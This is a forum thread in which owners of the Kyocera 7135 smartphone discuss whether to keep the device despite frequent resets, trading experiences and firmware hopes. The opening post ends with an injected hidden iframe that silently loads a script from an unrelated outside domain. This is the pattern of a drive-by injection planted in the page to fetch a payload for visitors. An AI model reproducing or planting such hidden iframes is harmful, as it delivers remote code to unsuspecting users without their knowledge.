+ Reply to Thread

Thread: Day 14....

Day 14....

Sunday is day 15 for me and my 7135. It is now crunch time and I must decide whether to keep or return it. I am truly amazed by the versatility of the unit, over the past 2 weeks i have; surfed the web in the airport, listened to full albums, downloaded various sound effects and audio clips which I have turned into ringers etc., played hours and hours of the best gaming the Palm OS offers, created lists, tables and files of all sorts of personal and professional info etc. I am a geek, and this is a geeks dream. On the other hand, I have never owned a more persnickety device (did I just say persnickety?) any way, I have had probably 9 soft resets, 2 hard, various glitches bugs and errors which I can't see improving over time. So the question remains, Should it stay or should it go? (and wait for the next super-cool phone) Any input would be appreciated.
    TIA<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Your decision should be your own, since it's a very subjective thing...

I haven't gotten any hard resets, except when I switched batteries. And I think that's because one of my batteries is 3 months old. But after I got it to make contact, no more hard resets.

I've only gotten lockups from 3rd party apps and hacks. The only one I can't resolve is when I copy/move a file using FileZ.

I don't know about you, but I could easy keep this phone for 3+ years.

Yeah, I'm expecting to hold onto this one for a couple of years. I haven't had a whole lot of soft resets (and I don't really care about soft resets unless they get too frequent as to be intrusive), and only one or two hard resets which were my fault. If you've had recurring problems, I guess it's a question of balancing those problems with the utility. Good luck...
    ---------------
    The same thing we do every night, Pinky...

Well, today is my day 14, and I have absolutely no qualms about keeping the thing. I've had no hard resets, only one soft reset, and I am very happy.

Mind you, I am going VERY slowly in putting Palm applications on the 7135, with only five or six "foreign" programs running. For me the question boils down to: If I had to live with the thing at the current level of functionality (that is, if every application I add after today causes my 7135 to be unusable, and I have to roll back to today's configuration), would I be happier than I was with my 6035?

The answer for me is: Yes, absolutely!

That is, even if the honeymoon ends abruptly tomorrow, I will still be truely, madly, and deeply in love with my 7135. I've been dependent upon my Palm since their first months shipping product, and dependent upon mobile phones since a couple of years after that (it took me a while to catch on to mobile phones). Now, having them both together in one unit, like the PDq, then 6035, and now the 7135, is something I have become totally dependent on, too. As with everything in these industries, the products keep getting better and better--Personally and professionally, I just can't see why the market for these devices isn't larger.

But then, as I've said elsewhere, my infatuation for the 7135 has made it clear to me that I am a pathetic techno-geek.

And proud of it!

St

Re: Day 14....

Originally posted by Lars1
    I am truly amazed by the versatility of the unit, over the past 2 weeks i have; surfed the web in the airport, listened to full albums, downloaded various sound effects and audio clips which I have turned into ringers etc., played hours and hours of the best gaming the Palm OS offers, created lists, tables and files of all sorts of personal and professional info etc. I am a geek, and this is a geeks dream.
    Does the above outweigh the below?

On the other hand, I have never owned a more persnickety device (did I just say persnickety?) any way, I have had probably 9 soft resets, 2 hard, various glitches bugs and errors which I can't see improving over time.
    It's all up to you, what will you get instead. Compare the 7135 with what you had before. I love mine and haven't had the problems others have had, maybe because I don't use as many 3rd party apps and no hacks.

I'm loving mine, but I haven't had any resets myself.

If you're worried about it though, think of how many software revisions the 6035 went through in it's short lifetime. I see the 7135 not only getting fixes, but possibly feature enhancements and additions as well (GPS access?)

I'm already searching to see what the latest firmware revision is for the 7135. I can see myself hanging out at the verizon tech store again with this model. With each revision it gets a little more stable and a lot more functional.

Just my 2¢ though.

I've had mine for 10 days now and I love it. I've had 3 soft resets but none in the last week. I do get the contrast problem sometimes but it just appears slightly brighter than normal but closing the lid and reopening resets it. Snappermail, Tinystocks and the web clipping apps all work. And only carrying one device on my belt is great.

I'd be surprised if Kyocera doesn't release updates in the next month or two that wipe out most of the issues people are experiencing. I'm fine with mine as things stand now... but even if I was bothered by some of the quirks I'd ride it out. Last time I checked there was nothing on the radar even comparable to the 7135.... and by the time there is I'll probably be ready to start daydreaming about the next great smartphone (I didn't lose my patience with the 6035 until about 18 months though )
    Please visit my picture site: Robert-O-Rama :)

Administrator
    just keep it..

jeh
    Since you're happy with the functionality... I'd return it, not for a refund, but for a replacement unit.

You should not tolerate a phone that requires that many resets in two weeks. One day you are going to NEED to make a phone call RIGHT NOW and you are going to open the thing and find you can't use it until it's been reset. At some point that will happen a few times in quick succession. At which point you will sorely regret your being so tolerant of problems now.

Feedback in this forum makes it clear to me that the "reset" problems are due to sample variations, not software bugs. A top-priced device like this just shouldn't frustrate us with "resets". Return it and demand one that's worth the $... in reliability as well as functionality.

Thanks guys for the advice and the opinions. I wasn't aware that there are bound to be firmware upgrades in the future. This gives me some hope! I do love the integration of the unit more than I am annoyed by it's faults, so I think I'll keep it. Side note question tho': Those of you in the know, how long (realisticly) till we see a more advanced, integrated Palm phone?

Anyway I thank you all and I will continue to formulate w/this forum.

Those of you in the know, how long (realisticly) till we see a more advanced, integrated Palm phone?
    I'm not "in the know" (about much of anything :p ), but I do try to follow this stuff as closely as possible without being obsessed by it (ok, I think I crossed that line back in 11/98 when the pdQ was announced).

The only two things I have heard about are the successor to the Treo 300, and the Samsung SGH-i500. Having read most of the Handspring press releases where the (allegedly) upcoming Treo is mentioned, I don't think there is enough to go on as far as specs and release date to pay too much attention yet. The SGH-i500 specs look impressive (definitely gives me confidence that the envelope can be pushed much further), there is no reason (yet) to believe that there will be a CDMA version of it (if that matters) or that it will ever be available in the US... and if it ever is, who knows when?

I expect to get a LOT of use out of my 7135 before I'm even tempted by anything else
    Please visit my picture site: Robert-O-Rama :)

Thanks Robert, Please see my post in "Verizon Express Network"